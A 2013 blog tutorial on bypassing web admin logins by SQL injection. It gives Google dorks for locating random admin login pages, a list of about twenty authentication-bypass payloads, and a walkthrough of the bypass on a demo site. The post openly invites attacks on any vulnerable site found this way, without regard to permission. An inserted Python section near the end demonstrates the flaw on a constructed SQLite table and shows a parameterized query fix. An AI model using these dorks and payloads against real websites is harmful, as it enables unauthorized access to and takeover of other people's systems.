Sunday, 28 April 2013

Exploiting web applications by SQL injection (step by step tutorial)


Hello Readers, today I am sharing with you how to exploit a web application with an SQL injection attack. In this post I show you, step by step, how to bypass an admin login using some queries.





What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

[Step – 1] Find an SQL Injection Vulnerable Website


First we need a vulnerable site to attack. This is the first step in SQL injection exploitation and, as in every other hacking attack, it is the most time-consuming step; in fact it is the only time-consuming step.


1) By Google Dork

Google dorks are the center of Google hacking. Google's index is the biggest, so hackers use various search engine operators or complex search queries against it to locate sensitive data and vulnerable devices on the internet. For example, use the Google dorks below to find random websites vulnerable to SQL injection.


There are a large number of Google dorks for basic SQL injection. Here are the best:


inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administratorlogin.asp
inurl:login/administrator.asp
inurl:administrator_login.asp


2) By Automated Tools

Today many tools are available for finding a vulnerable site. Tools make the work easy and save our time. Admin page finder tools scan websites for administrator login pages, using a predefined list of paths. After finding such a page, the tool presents us with the page on which we can log in with the administrator password. "Actually, finding the admin page is nothing but finding a particular directory of a website."
You can use an admin finder script (a Perl script); I shared this script in my previous post, where you can get the script and see the tutorial.

[Step - 2] SQL Injection Queries

Here is a list of popular SQL injection queries. We can use these to bypass login authentication. These queries confuse the database.


'or''='
admin'--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --

[Step – 3] Exploiting Web Applications by SQL Injection

After finding the admin page of a vulnerable web application, we can exploit it using client-supplied SQL queries. This enables us to execute unauthorized SQL commands.

For example, when a user logs onto a web page by entering a username and password for validation, an SQL query is used behind the form. However, an attacker can use SQL injection to send specially crafted username and password fields that poison the original SQL query.


Let's see an example that illustrates this kind of attack so that we can fully understand how it works. We have an SQL-vulnerable website.


We found an SQL injection point for exploitation. In the image below we can see the login page, i.e. the user authentication form, of this website.




www.demo.testfire.net has an authentication form for accessing the administration part of its website. The authentication requires the user to enter a valid username and password. After the username and password are sent, the application sends a query to the database to validate the user.

The query has the following format:



SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'




The application doesn't perform any sanitization of the received data, and therefore we have full control over what is sent to the server. The authentication form requests a username and a password from the user. If we enter a random username and password, the result page shows an "Invalid username or password" message.

The authentication requires the user to enter a valid username and password. We don't know a valid username and password, so we inject some SQL to bypass the login. In the username field we type admin as the username and in the password field we set 'or''='

The query has the following format:


SELECT *
FROM admin
WHERE username = 'admin' AND password = ''or''=''


 


The password clause now reads password = '' OR '' = '', and since '' = '' is always true, the WHERE clause matches the admin row. If the query runs successfully, we bypass the login without knowing the username and password. In the image below we can see that we bypassed the login and can use the admin panel as an administrator, managing the website's contents as we want.
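To make the mechanism above concrete, here is an added example (not code from the original post or from the testfire demo site) that builds the login query by string concatenation exactly as described, runs it against a constructed in-memory SQLite table, and places the parameterized form a defender would deploy beside it; the table, the row and the stored password are assumptions made up for the demo.

```python
import sqlite3

# Constructed in-memory database standing in for the site's "admin" table.
# The stored password is a made-up value, not anything from the post.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
conn.execute("INSERT INTO admin VALUES ('admin', 'constructed-demo-secret')")
conn.commit()


def build_vulnerable_query(username: str, password: str) -> str:
    """Build the query the way the post describes: user input is pasted
    straight into the SQL text with no sanitisation."""
    return ("SELECT * FROM admin WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(username: str, password: str):
    """Return the matched row or None. Any returned row counts as a login,
    so an always-true WHERE clause is enough to get in."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_parameterized(username: str, password: str):
    """Hardened form: the SQL text is fixed and the input travels as bound
    parameters, so quote characters in the input never reach the SQL parser
    and the whole password string is compared literally."""
    return conn.execute(
        "SELECT * FROM admin WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    payload = "'or''='"  # the password value used in the post
    print(build_vulnerable_query("admin", payload))
    # The concatenated query's clause becomes password = '' OR '' = '',
    # which matches the admin row without the real password.
    print("vulnerable login:", login_vulnerable("admin", payload))
    # With bound parameters the same input is just a wrong password.
    print("parameterized login:", login_parameterized("admin", payload))
```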


* In my next post we will discuss Blind SQL Injection.





